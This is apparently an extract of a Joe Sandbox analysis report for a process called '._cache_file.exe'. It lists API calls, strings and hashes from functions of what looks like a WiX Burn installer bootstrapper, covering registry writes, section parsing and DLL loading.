Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: pathutil.cpp
API String ID: 2776309574-741606033
Opcode ID: a95206db5cc39293bbd692ef61d3e3778b87833afcd3fa55f37fb0c217759e50
Instruction ID: d34acae760fc50737974df4bd3ad88e1a8219da73f4484317bcea707fc4f3534
Opcode Fuzzy Hash: a95206db5cc39293bbd692ef61d3e3778b87833afcd3fa55f37fb0c217759e50
Instruction Fuzzy Hash: 0DF0F633B04330ABEB32666A5C48E87BAD9DF45BA0B034122FE05EB150C721DD00AAF0

Function 000A0598 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000,?,?,000BBB7C,00000101,?), ref: 000A05EF

Strings

Failed to open registration key., xrefs: 000A05BF
Failed to update resume mode., xrefs: 000A05D9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update resume mode.
API String ID: 47109696-3366686031
Opcode ID: 611ccc1cafd362558a123549eb15004e8312f6d0f055783bc79cbbc97ca74428
Instruction ID: c4dcf94aac480b4f7c49a00f23b8ad6b532debdf9823b44ddd8f27a2e1916be1
Opcode Fuzzy Hash: 611ccc1cafd362558a123549eb15004e8312f6d0f055783bc79cbbc97ca74428
Instruction Fuzzy Hash: 58F0C832D4162DFBDB229AA5DC02BDFB769EF01750F100056F600B6151DB75AF1096D0

Function 000D48CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,0009B919,?,?,?,00000000,00000000), ref: 000D48E3
GetLastError.KERNEL32(?,?,?,0009B919,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 000D48ED

Strings

fileutil.cpp, xrefs: 000D4911

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastSize
String ID: fileutil.cpp
API String ID: 464720113-2967768451
Opcode ID: 54fae955cc75ed8fea65469882ca48c80e54ff2e7fb0289e4fd47d4626a3eb17
Instruction ID: aff9910ef034a3f719f944d3fe44664aef3ac24a40a31168142310c56883af33
Opcode Fuzzy Hash: 54fae955cc75ed8fea65469882ca48c80e54ff2e7fb0289e4fd47d4626a3eb17
Instruction Fuzzy Hash: 5AF04FB2A05329ABAB109F9998059ABFBECEF04750B01421BFD05E7340D771AD10CBE4

Function 000D30BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 000D30D4
SysFreeString.OLEAUT32(00000000), ref: 000D3104

Strings

xmlutil.cpp, xrefs: 000D30E8

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: e73c4ba0967e85814840a8b0ede48f7406daae25b29e019f6f3978d6ca3f7414
Instruction ID: ee4b3c99e47760b26e6f0dc0f6e506a3ade55f4ba992b08ac784b1b2a982ed38
Opcode Fuzzy Hash: e73c4ba0967e85814840a8b0ede48f7406daae25b29e019f6f3978d6ca3f7414
Instruction Fuzzy Hash: 70F0B436201759E7DB315E449C09FAB7BA5AF41B60F15002AFD046B310C7758E50AAB1

Function 000D336E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 000D3383
SysFreeString.OLEAUT32(00000000), ref: 000D33B3

Strings

xmlutil.cpp, xrefs: 000D339A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 78c516feb401fbb80e29461836f0e09c10e8cecd4d902719e1f3cbf76d919f87
Instruction ID: 83d50b43012a3c3c652a94a27dd1b136888b0b2697c3a3c0a119d6202f386c4e
Opcode Fuzzy Hash: 78c516feb401fbb80e29461836f0e09c10e8cecd4d902719e1f3cbf76d919f87
Instruction Fuzzy Hash: 64F09035200218E7C7210A49DD08E6A77A8AB85B60B15011AFD04AB3108B78CB10AAF2

Function 000D1344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0009F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 000D1359

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 000D1347
regutil.cpp, xrefs: 000D1381

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Value
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$regutil.cpp
API String ID: 3702945584-2416625845
Opcode ID: 65ee0799d85a681cb5c150627624146827f9d4c3b5b2683acbf453f04f6d6a1d
Instruction ID: ac3242d4280145721662b195fcd9be717677dd808e85983589519b18404a06ea
Opcode Fuzzy Hash: 65ee0799d85a681cb5c150627624146827f9d4c3b5b2683acbf453f04f6d6a1d
Instruction Fuzzy Hash: 57E06D72B443397AEB306AA68C05FE77ACCDF04BA0F014021BF08EA590D6618D00D6E4

Function 000CFCBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(75A70000,00000001,00095497,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000CFCC9
FreeLibrary.KERNEL32(00000000,00000001,00095497,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000CFCEB

Strings

`+?s, xrefs: 000CFCDB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FreeLibrary
String ID: `+?s
API String ID: 3664257935-3215494052
Opcode ID: 97bf30aaf83ee030c548a5be42a800512e46e55245ae1f422fac0cb4d5bedbb6
Instruction ID: 66f35111af3befd033a18dcf65b06e84296da21dcde8d156e7adfe2603f2883d
Opcode Fuzzy Hash: 97bf30aaf83ee030c548a5be42a800512e46e55245ae1f422fac0cb4d5bedbb6
Instruction Fuzzy Hash: 50E05AB5A00A068BA7008F2BFC88B35FBEDBB90B40305412BA810C2A34C77CC540EF20

Function 000D0CD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 000D0CF2

Strings

AdvApi32.dll, xrefs: 000D0CD7
RegDeleteKeyExW, xrefs: 000D0CE7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: 71e8aa4cf02262afec31743940550f568ba7a5ef69e6ac94915fc57392919afe
Instruction ID: c46dee0205194f3230377f423fedddb91e339e70bd37abcb77308e21aaa38a5b
Opcode Fuzzy Hash: 71e8aa4cf02262afec31743940550f568ba7a5ef69e6ac94915fc57392919afe
Instruction Fuzzy Hash: 81E04FB0605614DBE7149B64FC16A653A91AB14B047100119EA05DAE61CF6D5800EF60

Analysis Process: ._cache_file.exePID: 5544, Parent PID: 2896COMMON

Executed Functions

Function 6C8D23E7 Relevance: 30.5, APIs: 4, Strings: 13, Instructions: 723windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,?,?,00000031), ref: 6C8D246D
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8D2489
CompareStringW.KERNEL32(00000000,00000000,?,000000FF,disable,000000FF,?,?), ref: 6C8D2BD0
CompareStringW.KERNEL32(00000000,00000000,?,000000FF,hide,000000FF), ref: 6C8D2C14

Part of subcall function 6C8DC145: GetDlgItem.USER32(?,?), ref: 6C8DC154
Part of subcall function 6C8DC145: SetWindowTextW.USER32(00000000,6C8D2267), ref: 6C8DC162
Part of subcall function 6C8DC145: GetLastError.KERNEL32(?,6C8D2267,?,00000418,?), ref: 6C8DC16C

Strings

InstallFolder, xrefs: 6C8D2649
disable, xrefs: 6C8D2BC6
LaunchTarget, xrefs: 6C8D2742
#(loc.NET452WIN7RTMErrorMessage), xrefs: 6C8D2806
Disable control %ls, xrefs: 6C8D2BE1
Failed to localize NET452WIN7RTMErrorMessage: %ls, xrefs: 6C8D2837
Hide control %ls, xrefs: 6C8D2C25
Failed to initialize NET452WIN7RTMErrorMessage loc identifier., xrefs: 6C8D2815
The requested operation is successful. Changes will not be effective until the system is rebooted., xrefs: 6C8D245D
hide, xrefs: 6C8D2C06
%lsState, xrefs: 6C8D2B84
0x%08x - %ls, xrefs: 6C8D28C0
WixBundleElevated, xrefs: 6C8D24D8

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: CompareMessageString$ErrorItemLastPostTextWindow
String ID: #(loc.NET452WIN7RTMErrorMessage)$%lsState$0x%08x - %ls$Disable control %ls$Failed to initialize NET452WIN7RTMErrorMessage loc identifier.$Failed to localize NET452WIN7RTMErrorMessage: %ls$Hide control %ls$InstallFolder$LaunchTarget$The requested operation is successful. Changes will not be effective until the system is rebooted.$WixBundleElevated$disable$hide
API String ID: 2476112199-408053789
Opcode ID: f2bc25e2b24cad20fc645a2a3ec1a980f8dc20534fc4cb2710cfddd0f57ec5ad
Instruction ID: bef6947dfe9d5b43e2ff992fe2b501838bb1737ffd82b9656914ee4f74ddffe5
Opcode Fuzzy Hash: f2bc25e2b24cad20fc645a2a3ec1a980f8dc20534fc4cb2710cfddd0f57ec5ad
Instruction Fuzzy Hash: E842EF70A00705AEEB319F75CF44AABB6B9EF45308F124D39FA65A2950E734BD40CB21

Function 00691070 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006933D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,006910DD,?,00000000), ref: 006933F8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 006910F6

Part of subcall function 00691174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0069111A,cabinet.dll,00000009,?,?,00000000), ref: 00691185
Part of subcall function 00691174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,0069111A,cabinet.dll,00000009,?,?,00000000), ref: 00691190
Part of subcall function 00691174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0069119E
Part of subcall function 00691174: GetLastError.KERNEL32(?,?,?,?,0069111A,cabinet.dll,00000009,?,?,00000000), ref: 006911B9
Part of subcall function 00691174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006911C1
Part of subcall function 00691174: GetLastError.KERNEL32(?,?,?,?,0069111A,cabinet.dll,00000009,?,?,00000000), ref: 006911D6

CloseHandle.KERNEL32(?,?,?,?,006DB4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 00691131

Strings

feclient.dll, xrefs: 006910D1
version.dll, xrefs: 006910A7
crypt32.dll, xrefs: 006910CA
comres.dll, xrefs: 006910B5
msasn1.dll, xrefs: 006910C3
msi.dll, xrefs: 006910A0
cabinet.dll, xrefs: 00691099
wininet.dll, xrefs: 006910AE

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-2392521765
Opcode ID: 20e51a25a392528969eeb1cd75a3baaf0968f6ba3fc393e05a6a246c45e50d62
Instruction ID: 772280d75a25f8928f5be168ef0b1303fa7bed3080a5a3a945e73bffea63ced6
Opcode Fuzzy Hash: 20e51a25a392528969eeb1cd75a3baaf0968f6ba3fc393e05a6a246c45e50d62
Instruction Fuzzy Hash: 17217E71D00209EBDB50DFA5DC05AEEBBFAAF45314F11511AE920BA395D7709908CBA4

Function 6C8D1C04 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,00000000,bafunctions.dll,00000000,?,00000000,?,?,6C8D1B21,?,00000000,00000000,?,00000000,00000000,?), ref: 6C8D1C31
GetProcAddress.KERNEL32(00000000,CreateBootstrapperBAFunction), ref: 6C8D1C47
GetLastError.KERNEL32(?,6C8D1B21,?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000001), ref: 6C8D1C53
FreeLibrary.KERNEL32(?), ref: 6C8D1CBD

Strings

CreateBootstrapperBAFunction, xrefs: 6C8D1C41
Failed to create BA function., xrefs: 6C8D1C9C
Failed to get path to BA function DLL., xrefs: 6C8D1C27
Failed to get CreateBootstrapperBAFunction entry-point from: %ls, xrefs: 6C8D1C67
bafunctions.dll, xrefs: 6C8D1C16

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Library$AddressErrorFreeLastLoadProc
String ID: CreateBootstrapperBAFunction$Failed to create BA function.$Failed to get CreateBootstrapperBAFunction entry-point from: %ls$Failed to get path to BA function DLL.$bafunctions.dll
API String ID: 2540614322-2645503994
Opcode ID: c9041903bb2f1744ed5bb4a570736c181012615a36ac6725da52bbf24107a1a6
Instruction ID: 784e3d416ad8694053177bb2a2d1759c2b35ea06486dcbd2f82935f20ac9422d
Opcode Fuzzy Hash: c9041903bb2f1744ed5bb4a570736c181012615a36ac6725da52bbf24107a1a6
Instruction Fuzzy Hash: AE21A432A0051ABBDB365679EF047DAB6B8AF04369F020925E804E2A00EB32ED10D7D0

Function 6C8D65CB Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?), ref: 6C8D6606
FindClose.KERNELBASE(00000000), ref: 6C8D6612

Memory Dump Source

Source File: 00000002.00000002.3581599658.000000006C8D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8D0000, based on PE: true

Associated: 00000002.00000002.3581572943.000000006C8D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581629470.000000006C8EF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581649198.000000006C8FA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.3581682201.000000006C8FC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c8d0000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f6eb99cc7861606b43cb9e8b462ff796e55509ad2bffd23ddbc50cdaa607dbf3
Instruction ID: 844d3ae3d0eebe285744b987ae73797a19fff7309ccd2dfb9153c65dd10817f1
Opcode Fuzzy Hash: f6eb99cc7861606b43cb9e8b462ff796e55509ad2bffd23ddbc50cdaa607dbf3
Instruction Fuzzy Hash: 8301DB3160110C9BDB20EE65EE48D9EB77CDBCA319F010965F814D3640D6306D49C790

Function 0069F86E Relevance: 115.9, APIs: 3, Strings: 63, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to get @PerMachine., xrefs: 0069F9AF
PerMachine, xrefs: 0069F99C
yes, xrefs: 0069FBC0
DisplayName, xrefs: 0069FA08
Failed to get @Manufacturer., xrefs: 0069FCF0
Arp, xrefs: 0069F9BD
Comments, xrefs: 0069FB33
Failed to get @Register., xrefs: 0069F9FA
Update, xrefs: 0069FCA8
Failed to select registration node., xrefs: 0069F8A6
Failed to get @HelpTelephone., xrefs: 0069FAB3
Failed to get @UpdateUrl., xrefs: 0069FAFD
Failed to get @Department., xrefs: 0069FD18
Failed to parse related bundles, xrefs: 0069F90D
Department, xrefs: 0069FD01
ProviderKey, xrefs: 0069F95D
Failed to set registration paths., xrefs: 0069FD92
Failed to select Update node., xrefs: 0069FCC6
ProductFamily, xrefs: 0069FD26
Failed to parse @Version: %ls, xrefs: 0069F94F
Version, xrefs: 0069F91B
=Si, xrefs: 0069F86E
Publisher, xrefs: 0069FA52
UpdateUrl, xrefs: 0069FAE6
Failed to get @DisplayVersion., xrefs: 0069FA44
Failed to get @DisableModify., xrefs: 0069FC42
ParentDisplayName, xrefs: 0069FB0B
registration.cpp, xrefs: 0069FC11
Failed to get @Classification., xrefs: 0069FD7F
Tag, xrefs: 0069F8E1
Failed to get @HelpLink., xrefs: 0069FA8E
Failed to get @ProductFamily., xrefs: 0069FD3D
msasn1.dll, xrefs: 0069F8BF
Failed to get @ProviderKey., xrefs: 0069F970
Failed to get @DisplayName., xrefs: 0069FA1F
DisplayVersion, xrefs: 0069FA2D
Classification, xrefs: 0069FD6C
HelpTelephone, xrefs: 0069FA9C
AboutUrl, xrefs: 0069FAC1
Failed to select ARP node., xrefs: 0069F9D9
Failed to get @Version., xrefs: 0069F92E
Failed to get @DisableRemove., xrefs: 0069FC6A
Failed to get @Tag., xrefs: 0069F8F4
Failed to parse software tag., xrefs: 0069FC9A
ExecutableName, xrefs: 0069F97E
Failed to get @Publisher., xrefs: 0069FA69
Failed to get @Name., xrefs: 0069FD5E
HelpLink, xrefs: 0069FA77
Failed to get @Comments., xrefs: 0069FB4A
Failed to get @Id., xrefs: 0069F8D3
Registration, xrefs: 0069F888
DisableModify, xrefs: 0069FB80
Register, xrefs: 0069F9E7
Failed to get @ParentDisplayName., xrefs: 0069FB22
Invalid modify disabled type: %ls, xrefs: 0069FC1E
Failed to get @ExecutableName., xrefs: 0069F991
Manufacturer, xrefs: 0069FCDD
button, xrefs: 0069FB9F
Failed to get @Contact., xrefs: 0069FB72
DisableRemove, xrefs: 0069FC53
Contact, xrefs: 0069FB5B
Failed to get @AboutUrl., xrefs: 0069FAD8
Name, xrefs: 0069FD4B

Memory Dump Source

Source File: 00000002.00000002.3580257721.0000000000691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000002.00000002.3580219883.0000000000690000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580322591.00000000006DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580362741.00000000006FA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3580382956.00000000006FE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_690000_UNK_.jbxd

Similarity

API ID:
String ID: =Si$AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$msasn1.dll$registration.cpp$yes
API String ID: 0-10724523
Opcode ID: 2ee847d53032b5bb6f42684e67cc04877ef4d47b7580c7973fa60a1eaf1705de
Instruction ID: af29d906d29469390216300ad639ae39d7aefda001c3c8187c79bb7098d6b6db
Opcode Fuzzy Hash: 2ee847d53032b5bb6f42684e67cc04877ef4d47b7580c7973fa60a1eaf1705de
Instruction Fuzzy Hash: 3CE1A532E417B6BACF119BA1CC41EEDBA6B6F00710F130275F910FAB50DB615D85A685

Function 0069B389 Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 565
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0069B3FF
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B44C
GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0069B452
ReadFile.KERNELBASE(00000000,\CiH,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B49A
GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0069B4A0
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B4FD
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B503
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B54C
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B552
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B5C3
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0069B5C9

Strings

\CiH, xrefs: 0069B3A0, 0069B494, 0069B4E7, 0069B3AD, 0069B497
Failed to read section info, data to short: %u, xrefs: 0069B7A6
Failed to open handle to engine process path., xrefs: 0069B42A
.wix, xrefs: 0069B72C
PE Header from file didn't match PE Header in memory., xrefs: 0069BA0D
Failed to find Burn section., xrefs: 0069BA2E
burn, xrefs: 0069B734
Failed to seek to section info., xrefs: 0069B5F4, 0069B830
(, xrefs: 0069B719
Failed to allocate buffer for section info., xrefs: 0069B7E0
Failed to read signature size., xrefs: 0069B692
Failed to seek past optional headers., xrefs: 0069B6E7
Failed to read image section header, index: %u, xrefs: 0069BAA8
Failed to seek to NT header., xrefs: 0069B52E
Failed to read signature offset., xrefs: 0069B643
Failed to read DOS header., xrefs: 0069B4CB
Failed to find valid NT image header in buffer., xrefs: 0069BACC
4, xrefs: 0069B780
Failed to read section info., xrefs: 0069B895
section.cpp, xrefs: 0069B420, 0069B473, 0069B4C1, 0069B524, 0069B573, 0069B5EA, 0069B639, 0069B688, 0069B6DD, 0069B794, 0069B7D4, 0069B826, 0069B88B, 0069B8B5, 0069B8DC, 0069B9C3, 0069BA03, 0069BA22, 0069BA5F, 0069BA9D, 0069BAC0, 0069BADB
Failed to seek to start of file., xrefs: 0069B47D
Failed to allocate memory for container sizes., xrefs: 0069B9CF
PE, xrefs: 0069B594
Failed to get total size of bundle., xrefs: 0069B91F
Failed to read complete image section header, index: %u, xrefs: 0069BA71
Failed to read NT header., xrefs: 0069B57D
Failed to read section info, unsupported version: %08x, xrefs: 0069B8F1
Failed to read complete section info., xrefs: 0069B8C1
Failed to find valid DOS image header in buffer., xrefs: 0069BAE7

Memory Dump Source

